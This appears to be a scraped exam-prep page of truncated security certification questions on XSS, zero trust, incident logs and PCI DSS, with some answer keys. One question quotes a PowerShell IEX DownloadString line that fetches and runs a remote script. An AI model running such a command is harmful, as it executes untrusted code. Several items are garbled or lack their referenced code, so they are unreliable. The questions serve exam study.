- All Exams Instant Download
Which of the following sources could the architect consult to address this security concern?
A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could...
Which of the following is the MOST likely root cause?
A security operations center analyst is investigating anomalous activity between a database server and an unknown external IP address and gathered the following data: • dbadmin last logged in at 7:30 a.m. and logged out at 8:05 a.m. • A persistent TCP/6667 connection to the external address was established at...
Which of the following vulnerabilities does the code snippet resolve?
A developer implement the following code snippet. Which of the following vulnerabilities does the code snippet resolve?A . SQL inject B. Buffer overflow C. Missing session limit D. Information leakageView AnswerAnswer: D
Which of the following architectural designs should the organization use to meet these requirements?
An organization is designing a network architecture that must meet the following requirements: Users will only be able to access predefined services. Each user will have a unique allow list defined for access. The system will construct one-to-one subject/object access paths dynamically. Which of the following architectural designs should the...
Which of the following security controls would have alerted and prevented the next phase of the attack?
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have...
Which of the following is MOST likely happening to the server?
Users are claiming that a web server is not accessible. A security engineer logs for the site. The engineer connects to the server and runs netstat -an and receives the following output: Which of the following is MOST likely happening to the server?A . Port scanning B. ARP spoofing C....
Which of the following would BEST assist the analyst?
A cybersecurity analyst receives a ticket that indicates a potential incident is occurring. There has been a large in log files generated by a generated by a website containing a ‘’Contact US’’ form. The analyst must determine if the increase in website traffic is due to a recent marketing campaign...
Which of the following scan types will provide the systems administrator with the MOST accurate information?
A systems administrator is preparing to run a vulnerability scan on a set of information systems in the organization. The systems administrator wants to ensure that the targeted systems produce accurate information especially regarding configuration settings. Which of the following scan types will provide the systems administrator with the MOST...
Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?
A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very...
Which of the following data objects meets this requirement?
Based on PCI DSS v3.4, One Particular database field can store data, but the data must be unreadable. Which of the following data objects meets this requirement?A . PAN B. CVV2 C. Cardholder name D. expiration dateView AnswerAnswer: A
